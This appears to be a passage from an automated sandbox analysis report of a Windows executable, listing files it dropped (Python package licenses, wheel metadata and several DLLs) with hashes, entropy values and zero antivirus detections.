                                                                                                                                                                                                                                            SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                            SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11360
                                                                                                                                                                                                                                            Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                            MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                            SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                            SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                            SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1532
                                                                                                                                                                                                                                            Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                            MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                            SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                            SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                            SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7900672
                                                                                                                                                                                                                                            Entropy (8bit):6.519460416205842
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Hvisa2OcIo0UYN1YA2sBCT7I0XIU6iOGtlqNVwASO0AIjoI+b0vjemXSKSDhxlT3:Pi/2PTYDBCT7NY+gTNxY7GbdJ295x
                                                                                                                                                                                                                                            MD5:81AD4F91BB10900E3E2E8EAF917F42C9
                                                                                                                                                                                                                                            SHA1:840F7AEF02CDA6672F0E3FC7A8D57F213DDD1DC6
                                                                                                                                                                                                                                            SHA-256:5F20D6CEC04685075781996A9F54A78DC44AB8E39EB5A2BCF3234E36BEF4B190
                                                                                                                                                                                                                                            SHA-512:11CD299D6812CDF6F0A74BA86EB44E9904CE4106167EBD6E0B81F60A5FCD04236CEF5CFF81E51ED391F5156430663056393DC07353C4A70A88024194768FFE9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):86016
                                                                                                                                                                                                                                            Entropy (8bit):5.958571842352702
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:OwsZ607E6QFvkncm4nraT1G5YDHykXxA:o80w6QFsMWpG5YDHdXx
                                                                                                                                                                                                                                            MD5:D7193BEA71087B94502C6B3A40120B04
                                                                                                                                                                                                                                            SHA1:51AA3825A885A528356BA339F599C557E9973EC3
                                                                                                                                                                                                                                            SHA-256:886375BC6F0FF2BBD1E8280F8F1CB29C93F94B8E25B5076043CD796654C3A193
                                                                                                                                                                                                                                            SHA-512:C65CEF39362A75814D40132F4F54F25F258C484DD011B12AE7051FA52865F025C960E4A3130C699B7EB1BE375A3D2C3C3B733D6543338D7E40AAD0488D305056
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5232408
                                                                                                                                                                                                                                            Entropy (8bit):5.940072183736028
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                                                            MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                                                            SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                                                            SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                                                            SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):792856
                                                                                                                                                                                                                                            Entropy (8bit):5.57949182561317
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                                                            MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                                                            SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                                                            SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                                                            SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):46592
                                                                                                                                                                                                                                            Entropy (8bit):5.417086235508803
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:67CE1/NMVzMoCQVbrw0k6To3OOG/B+jPSrSRNj4bSM2V:QruzMoNrNTo3OOG/eRF4be
                                                                                                                                                                                                                                            MD5:4EED96BBB1C4B6D63F50C433E9C0A16A
                                                                                                                                                                                                                                            SHA1:CDE34E8F1DAC7F4E98D2B0AAF1186C6938DE06C3
                                                                                                                                                                                                                                            SHA-256:B521B7E3B6BED424A0719C36735BC4BF2BB8B0926370B31C221C604E81F8D78B
                                                                                                                                                                                                                                            SHA-512:1CACB250D867FCBBC5224C3F66CB23A93F818BC1D0524CAD6D1C52295D243AF10F454FDE13FA58671D3EE62281A2A3F71A69F28B08FD942FCEDBA3C9B09A774A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202008
                                                                                                                                                                                                                                            Entropy (8bit):6.369252583877094
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:qwJ1l3SauVCjLwifFPYKDRW97oaU+1urfmwl1CnLiHbe7pjMeU8F5IMLhA8:73SauVCwi6KDRW97oaVybCLiS7pq8FZ
                                                                                                                                                                                                                                            MD5:8C1F876831395D146E3BCADCEA2486DD
                                                                                                                                                                                                                                            SHA1:82CBFB59F0581A0554D6A5061E1F82E6B46A3473
                                                                                                                                                                                                                                            SHA-256:D32D7722D6ED2B2780C039D63AF044554C0BA9CF6E6EFEF28EBC79CB443D2DA0
                                                                                                                                                                                                                                            SHA-512:73067BB8DCC44CD52551A48400BD8E721268DD44F9884EBB603452ECE9C7BD276D40B7CBCA4F10223F27B8CCDCD1D2EC298A1C767A691859AEA10056C108A730
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):68376
                                                                                                                                                                                                                                            Entropy (8bit):6.147701397143669
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:OV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/d:ODmF61JFn+/Ob5IML0l7SySxUx
                                                                                                                                                                                                                                            MD5:5EACE36402143B0205635818363D8E57
                                                                                                                                                                                                                                            SHA1:AE7B03251A0BAC083DEC3B1802B5CA9C10132B4C
                                                                                                                                                                                                                                            SHA-256:25A39E721C26E53BEC292395D093211BBA70465280ACFA2059FA52957EC975B2
                                                                                                                                                                                                                                            SHA-512:7CB3619EA46FBAAF45ABFA3D6F29E7A5522777980E0A9D2DA021D6C68BCC380ABE38E8004E1F31D817371FB3CDD5425D4BB115CB2DC0D40D59D111A2D98B21D4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6927640
                                                                                                                                                                                                                                            Entropy (8bit):5.765552513907485
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:mRSn173WIgXqQYRn0I+gaYFD0iRpIrCMEGXgeieBwHTuJTA8LbLH7ft4OCLj8j4V:mIn8hYEgw8Ij887GlSvBHDMiEruuln
                                                                                                                                                                                                                                            MD5:166CC2F997CBA5FC011820E6B46E8EA7
                                                                                                                                                                                                                                            SHA1:D6179213AFEA084F02566EA190202C752286CA1F
                                                                                                                                                                                                                                            SHA-256:C045B57348C21F5F810BAE60654AE39490846B487378E917595F1F95438F9546
                                                                                                                                                                                                                                            SHA-512:49D9D4DF3D7EF5737E947A56E48505A2212E05FDBCD7B83D689639728639B7FD3BE39506D7CFCB7563576EBEE879FD305370FDB203909ED9B522B894DD87AACB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):31000
                                                                                                                                                                                                                                            Entropy (8bit):6.556986708902353
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:IyRVBC9t6Lhz64CHf2slDT90Y5IMQGCHQIYiSy1pCQFm/AM+o/8E9VF0Ny/r5n+/:LGyKHfx1H5IMQGY5YiSyv4AMxkEFNnq
                                                                                                                                                                                                                                            MD5:7C14C7BC02E47D5C8158383CB7E14124
                                                                                                                                                                                                                                            SHA1:5EE9E5968E7B5CE9E4C53A303DAC9FC8FAF98DF3
                                                                                                                                                                                                                                            SHA-256:00BD8BB6DEC8C291EC14C8DDFB2209D85F96DB02C7A3C39903803384FF3A65E5
                                                                                                                                                                                                                                            SHA-512:AF70CBDD882B923013CB47545633B1147CE45C547B8202D7555043CFA77C1DEEE8A51A2BC5F93DB4E3B9CBF7818F625CA8E3B367BFFC534E26D35F475351A77C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7634
                                                                                                                                                                                                                                            Entropy (8bit):4.503638339817033
                                                                                                                                                                                                                                            Encrypted:false
Malicious:false
Preview:GNU LESSER GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed.... This version of the GNU Lesser General Public License incorporates.the terms and conditions of version 3 of the GNU General Public.License, supplemented by the additional permissions listed below... 0. Additional Definitions... As used herein, "this License" refers to version 3 of the GNU Lesser.General Public License, and the "GNU GPL" refers to version 3 of the GNU.General Public License... "The Library" refers to a covered work governed by this License,.other than an Application or a Combined Work as defined below... An "Application" is any work that makes use of an interface provided.by the Library, but which is not otherwise based on the Library..Defining a subclass of a class defined by the Library is de
Process:C:\Users\user\Desktop\dens.exe
File Type:Python script, ASCII text executable, with very long lines (855)
Category:dropped
Size (bytes):15006
Entropy (8bit):4.800156894367144
Encrypted:false
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:Metadata-Version: 2.1.Name: autocommand.Version: 2.2.2.Summary: A library to create a command-line program from a function.Home-page: https://github.com/Lucretiel/autocommand.Author: Nathan West.License: LGPLv3.Project-URL: Homepage, https://github.com/Lucretiel/autocommand.Project-URL: Bug Tracker, https://github.com/Lucretiel/autocommand/issues.Platform: any.Classifier: Development Status :: 6 - Mature.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3).Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development.Classifier: Topic :: Software Development :: Libraries.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Python: >=3.7.Description-Content-Type: text/markdown.License-File: LICENSE..[![PyPI version](https://badge.fury.io/py/autocommand.svg)](
Process:C:\Users\user\Desktop\dens.exe
File Type:CSV text
Category:dropped
Size (bytes):1308
Entropy (8bit):5.721750099226425
Encrypted:false
Malicious:false
Preview:autocommand-2.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..autocommand-2.2.2.dist-info/LICENSE,sha256=reeNBJgtaZctREqOFKlPh6IzTdOFXMgDSOqOJAqg3y0,7634..autocommand-2.2.2.dist-info/METADATA,sha256=OADZuR3O6iBlpu1ieTgzYul6w4uOVrk0P0BO5TGGAJk,15006..autocommand-2.2.2.dist-info/RECORD,,..autocommand-2.2.2.dist-info/WHEEL,sha256=2wepM1nk4DS4eFpYrW1TTqPcoGNfHhhO_i5m4cOimbo,92..autocommand-2.2.2.dist-info/top_level.txt,sha256=AzfhgKKS8EdAwWUTSF8mgeVQbXOY9kokHB6kSqwwqu0,12..autocommand/__init__.py,sha256=zko5Rnvolvb-UXjCx_2ArPTGBWwUK5QY4LIQIKYR7As,1037..autocommand/__pycache__/__init__.cpython-312.pyc,,..autocommand/__pycache__/autoasync.cpython-312.pyc,,..autocommand/__pycache__/autocommand.cpython-312.pyc,,..autocommand/__pycache__/automain.cpython-312.pyc,,..autocommand/__pycache__/autoparse.cpython-312.pyc,,..autocommand/__pycache__/errors.cpython-312.pyc,,..autocommand/autoasync.py,sha256=AMdyrxNS4pqWJfP_xuoOcImOHWD-qT7x06wmKN1Vp-U,5680..autocommand/autoco
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text
Category:dropped
Size (bytes):92
Entropy (8bit):4.842566724466667
Encrypted:false
Malicious:false
Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.38.4).Root-Is-Purelib: true.Tag: py3-none-any..
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text
Category:dropped
Size (bytes):12
Entropy (8bit):3.084962500721156
Encrypted:false
Malicious:false
Preview:autocommand.
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text
Category:dropped
Size (bytes):4
Entropy (8bit):1.5
Encrypted:false
Malicious:false
Preview:pip.
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text
Category:dropped
Size (bytes):1023
Entropy (8bit):5.059832621894572
Encrypted:false
Malicious:false
Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text
Category:dropped
Size (bytes):2020
Entropy (8bit):5.0469065437932175
Encrypted:false
Malicious:false
Preview:Metadata-Version: 2.1.Name: backports.tarfile.Version: 1.2.0.Summary: Backport of CPython tarfile module.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/backports.tarfile.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'testing'.Requires-Dist: pytest-cov ; extra == 'testing
Process:C:\Users\user\Desktop\dens.exe
File Type:CSV text
Category:dropped
Size (bytes):1360
Entropy (8bit):5.753738299642538
Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:U6rn/2zDJ6rvbqfuG6rJnB6rU6rEsJYB6rXamx6rlCHmTKjaQliwxJlp5DQljQls:NnuXIzUurJwN5JjfAlqYK9liSlp5DQlP
                                                                                                                                                                                                                                            MD5:CF347AE8E31132435B127226F358F8CD
                                                                                                                                                                                                                                            SHA1:2C857B300638FF291651234BBB2C077BEEF494E4
                                                                                                                                                                                                                                            SHA-256:258A1F1C849E1175069A55A5D6CE357AFDD04E34CD5DE27093E4ACEC7A9D2CE1
                                                                                                                                                                                                                                            SHA-512:2A46C7FDFA2F9883BB1D761646B33BE9CE7B07280A5BF38992C1C84AB0449944EB0CAF34620CCC82DDBBC193F0D54AE67797D97863F70CA0C24EE55A3B401F9C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:backports.tarfile-1.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..backports.tarfile-1.2.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..backports.tarfile-1.2.0.dist-info/METADATA,sha256=ghXFTq132dxaEIolxr3HK1mZqm9iyUmaRANZQSr6WlE,2020..backports.tarfile-1.2.0.dist-info/RECORD,,..backports.tarfile-1.2.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..backports.tarfile-1.2.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..backports.tarfile-1.2.0.dist-info/top_level.txt,sha256=cGjaLMOoBR1FK0ApojtzWVmViTtJ7JGIK_HwXiEsvtU,10..backports/__init__.py,sha256=iOEMwnlORWezdO8-2vxBIPSR37D7JGjluZ8f55vzxls,81..backports/__pycache__/__init__.cpython-312.pyc,,..backports/tarfile/__init__.py,sha256=Pwf2qUIfB0SolJPCKcx3vz3UEu_aids4g4sAfxy94qg,108491..backports/tarfile/__main__.py,sha256=Yw2oGT1afrz2eBskzdPYL8ReB_3liApmhFkN2EbDmc4,59..backports/tarfile/__pycache__/__init__.cpython-312.pyc,,..back
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:21v:ev
                                                                                                                                                                                                                                            MD5:9BA458821AD258B6EF62B47E91302982
                                                                                                                                                                                                                                            SHA1:9EDB9E6BA5C4001CE2FCCF328739292404EA9604
                                                                                                                                                                                                                                            SHA-256:7068DA2CC3A8051D452B4029A23B73595995893B49EC91882BF1F05E212CBED5
                                                                                                                                                                                                                                            SHA-512:3A296E5DADD5B406330BA088BFED33BE6960F8FF42DB6651E185FF14F2272FC819EF520D1A15BC40DA4E20B9CA0E5D79170EDF33F3D50937C7FBEDB338CAC730
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:backports.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
